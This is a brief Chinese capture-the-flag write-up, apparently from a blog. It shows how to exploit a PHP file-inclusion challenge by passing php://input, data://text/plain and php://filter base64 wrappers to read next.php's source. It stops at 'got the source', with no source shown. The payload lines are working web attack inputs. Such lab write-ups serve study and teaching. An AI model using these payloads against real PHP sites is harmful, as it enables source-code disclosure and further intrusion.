考点
代码审计
命令执行
解题打开环境
首先注释中提示next.php
,我们可以利用php伪协议获取
php://input
text=php://input&file=php://filter/read=convert.base64-encode/resource=next.php
POST:
I have a dream
data://text/plain
text=data://text/plain,I%20have%20a%20dream&file=php://filter/read=convert.base64-encode/resource=next.php
得到源码:
关注
打赏